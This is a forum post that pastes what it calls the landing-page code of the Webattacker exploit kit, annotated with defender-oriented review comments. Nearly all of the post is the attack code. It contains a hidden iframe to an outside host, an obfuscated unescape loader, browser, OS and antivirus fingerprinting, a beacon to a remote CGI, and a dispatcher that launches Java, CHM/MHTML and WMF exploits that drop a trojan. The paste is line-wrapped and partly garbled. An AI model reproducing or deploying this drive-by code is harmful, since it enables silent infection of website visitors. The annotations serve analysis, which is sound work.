You haven't seen the code for Webattacker, yet are positive it is
JavaScript-based? Hrmm...
Anyway, no, I assure you, the problem arose from you using Internet
Explorer 6 *with* lax security settings, and the code used to pervert
your system was indeed Microsoft-specific (VBScript).
I just found some of the Webattacker code:
<iframe src="
http://fl4w.info/shit/index.php" width=1 height=1></
iframe>
<!--hppage status="protected"-->
<HTML xmlns:IE>
<TITLE>Demo page</TITLE>
<!-- Wrapper script, presumably emitted by the page-protection tool that left
     the hppage marker at the top of this page. The percent-encoded argument
     decodes to a second SCRIPT element that sets hp_ok=true and defines
     hp_d00(s), which calls document.write(s) while hp_ok is set. Nothing else
     in this listing calls hp_d00, so the payload selection is not here; it is
     in the script block inside BODY. For triage, decode unescape() arguments
     before doing any string matching on a page like this. -->
<HEAD><SCRIPT LANGUAGE="JavaScript"><!--
document.write(unescape("%3C%53%43%52%49%50%54%20%4C%41%4E
%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D
%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E
%20%68%70%5F%64%30%30%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B
%29%72%65%74%75%72%6E%3B%64%6F%63%75%6D%65%6E%74%2E
%77%72%69%74%65%28%73%29%7D%2F%2F%2D%2D%3E%3C%2F
%53%43%52%49%50%54%3E"));//--></SCRIPT>
<STYLE type='text/css'>
IE\:clientCaps {behavior:url(#default#clientcaps)}
</STYLE>
</HEAD>
<BODY onLoad="setTimeout('Run_BOF()',2000);"><NOSCRIPT>To display this
page you need a browser with JavaScript support.</NOSCRIPT>
<CENTER><H1>This site is under construction...</H1></CENTER>
<IFRAME name="StatPage" width=5 height=5 style="display:none"></
IFRAME>
<IFRAME name="PageContainer" width=5 height=5 style="display:none"></
IFRAME>
<DIV id="ObjectContainer"></DIV>
<IE:clientCaps ID="oClientCaps" />
<script type="text/javascript" language="JavaScript">
// Selector shared by the profiling code below and by Run_BOF(). It starts at 0,
// for which the dispatch switch further down takes its empty default branch;
// the profiling code sets it to a value from 1 to 5.
var ExploitNumber=0;
// Asks the IE clientCaps behavior (the oClientCaps element declared in the page
// markup) whether the component identified by CLSID is installed.
// Written to return the component version split on commas when it is present,
// and Array(0,0,0,0) when isComponentInstalled() reports it absent.
// NOTE(review): the forum paste wrapped the first return statement onto two
// lines, so this listing is not the original layout of the code.
function GetVersion(CLSID)
{
if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
{return
oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
else
{return Array(0,0,0,0);}
}
// Maps a browser version string (the caller passes navigator.appVersion) to a
// short Windows label by substring match: 95, NT, ME, 98, 2K, XP or 2K3.
// There is no final else, so a string that matches none of the patterns yields
// undefined, which sends the caller's switch on the label to its default case.
function Get_Win_Version(IE_vers)
{
if (IE_vers.indexOf('Windows 95') != -1) return "95"
else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
else if (IE_vers.indexOf('Windows 98') != -1) return "98"
else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
}
// Deferred stage for selector value 4 only: the body is skipped unless
// ExploitNumber==4. The function is scheduled 2000 ms after load by the BODY
// onLoad handler and again by case 4 of the dispatch switch. The selection
// switch assigns 4 on the 2K3 and XP paths when one of the two
// security-product flags is set.
// When active it refocuses this window, writes four 1x1 iframes that load
// pluginst.htm and then one that loads ie0601d.htm; those two file names and
// the 1x1 iframe pattern are the indicators this function contributes.
// NOTE(review): both writeln string literals are broken across lines by the
// forum paste, and the loop counter i is assigned without var.
function Run_BOF()
{
if (ExploitNumber==4)
{
self.focus();
for (i=1 ; i <=4 ; i++)
{
document.writeln('<iframe width=1 height=1 border=0
frameborder=0 src="pluginst.htm"></iframe>');
}
document.writeln('<iframe width=1 height=1 border=0
frameborder=0 src="ie0601d.htm"></iframe>');
}
}
// Top-level driver of the quoted landing page. It reports the visit to the CGI
// endpoint below, profiles the browser, sets ExploitNumber, and then loads one
// follow-up page or object. For a defender the value of the listing is the set
// of things it touches: the CGI URL, the follow-up file names, the two probed
// ActiveX ProgIDs, and the hidden StatPage and PageContainer iframes.
// NOTE(review): the forum wrapped long lines and appears to have dropped some
// characters, so this is an inexact copy with several statements split
// mid-token; read it as a specimen, not as runnable code.
var CGI_Script="
http://jag.mews.ru/cgi-bin/ie0601.cgi";
// Branch on navigator.appName: IE gets the full profiling path; Netscape-family
// browsers and everything else only send the click beacon (Firefox is also
// pointed at one extra page).
if (navigator.appName=="Microsoft Internet Explorer")
{
Click_Request=CGI_Script+"?click";
// InetPath becomes the current page URL cut at its last slash, i.e. the
// directory the landing page was served from.
var InetPath=document.location.href;
j=InetPath.lastIndexOf('/');
InetPath=InetPath.slice(0,j);
var IEversion=navigator.appVersion;
var IEplatform=navigator.platform;
// Profiling continues only when navigator.platform contains Win32.
if (IEplatform.search("Win32") != -1)
{
var WinOS=Get_Win_Version(IEversion);
// appMinorVersion is split on semicolons; entries containing SP are appended
// to the beacon query string, so the server receives the reported
// service-pack level of every IE visitor.
FullVersion=clientInformation.appMinorVersion;
PatchList=FullVersion.split(";");
// NOTE(review): PatchList appears without an element index in this loop and
// again in the SP2 comparison further down; probably characters lost to forum
// markup rather than the code as it was served.
for (var i=0; i < PatchList.length; i++)
{
ServicePack=PatchList
;
j=ServicePack.indexOf('SP');
if (j != -1)
{
ServicePack=ServicePack.substr(j);
Click_Request=Click_Request+'&'+ServicePack;
}
}
// The beacon is sent by pointing the hidden StatPage iframe at the CGI URL.
StatPage.location=Click_Request;
// Component versions read through clientCaps. Going by the variable names the
// two CLSIDs are the Microsoft Java VM and Internet Explorer itself; confirm
// against a CLSID reference before relying on that.
var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-
AAA5-00401C608500}");
var IE_vers = GetVersion("{89820200-
ECBD-11CF-8B85-00AA005B4383}");
// Security-product probe: each ProgID is instantiated inside try/catch and the
// flag is set only if creation succeeds; failures are swallowed on purpose.
// A web page attempting to create these two ProgIDs is a detection signal.
fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;
try
{
var oNortonAV=new
ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config
Wizard initialization
fNortonAV=1;
}
catch(e){}
try
{
var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); //
McAfee Security Download Control initialization
fMcAfee=1;
}
catch(e){}
// Selection table. Inputs: the OS label, the third field of the Java VM
// version compared with 3810, the two security-product flags, and on XP the
// SP2 flag. Output: ExploitNumber from 1 to 5.
switch (WinOS)
{
case "2K":
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM =
5.0.3810.0 or higher
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=2; }
}
break;
case "2K3":
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=4; }
break;
case "XP":
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if
JVM = 5.0.3810.0 or higher
{
for (var i=0; i < PatchList.length; i+
+)
{
if (PatchList=="SP2")
{ XP_SP2_patched=1; }
}
if (XP_SP2_patched==0)
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=3; }
else
{ ExploitNumber=4; }
}
else
{
if ((fNortonAV==0)&&(fMcAfee==0))
{ ExploitNumber=5; }
else
{ ExploitNumber=4; }
}
}
break;
default:
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else
{ ExploitNumber=2; } // if JVM =
5.0.3810.0 or higher
break;
}
// Delivery step. Each case loads a different file from the landing page
// directory (InetPath) or passes a URL on the CGI host to it.
// launching exploit which number is depends on Windows and
IE versions
switch (ExploitNumber)
{
// 1: Java applet TakePrivileges.class from ie0601a.jar, handed a CGI URL tagged
// exploit=MS03-11 as its ModulePath parameter.
case 1:
Trojan_Path=CGI_Script+"?exploit=MS03-11";
ObjectContainer.innerHTML='<applet
archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'"
code="TakePrivileges.class" width=1 height=1><param name="ModulePath"
value="'+Trojan_Path+'"></applet>';
break;
// 2: OBJECT of type text/x-scriptlet whose data URL chains protocol handlers to
// ie0601b.chm. The handler prefix is percent-encoded (it decodes to
// ms-its:mhtml:), so signatures should match the decoded form.
case 2:
CHM_base='//ie0601b.chm'+'::'+'/main.htm';
Protocol=unescape("%6ds-i%74s:%6dh%74%6dl:");
Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;
oMSITS=document.createElement("<OBJECT
data='"+Init_String+"' type='text/x-scriptlet'></OBJECT>");
document.body.appendChild(oMSITS);
document.title="Loaded !";
break;
// 3: ie0601c.htm opened in a 50x50 popup placed at 2000,2000 (presumably
// off-screen), after which focus is pulled back to this window.
case 3:
window.open("ie0601c.htm","Info","left=2000,top=2000,screenX=2000,screenY=2000,width=50,height=50,scrollbars=1,menubar=0,titlebar=0,toolbar=0,status=0");
self.focus();
break;
// 4: schedules Run_BOF again after 2000 ms.
case 4:
;setTimeout('Run_BOF()',2000);
break;
// 5: ie0601e.wmf loaded into the hidden PageContainer iframe.
case 5:
PageContainer.location="ie0601e.wmf";
break;
default:
break;
}
}
}
// Non-IE visitors: beacon only, except that a user agent containing Firefox is
// also sent to mfsa0601.htm through the hidden PageContainer iframe.
else if (navigator.appName=="Netscape")
{
StatPage.location=CGI_Script+"?click";
if (navigator.userAgent.indexOf('Firefox') != -1)
{
PageContainer.location="mfsa0601.htm";
}
}
else
{
StatPage.location=CGI_Script+"?click";
}
</script>
</BODY>
</HTML>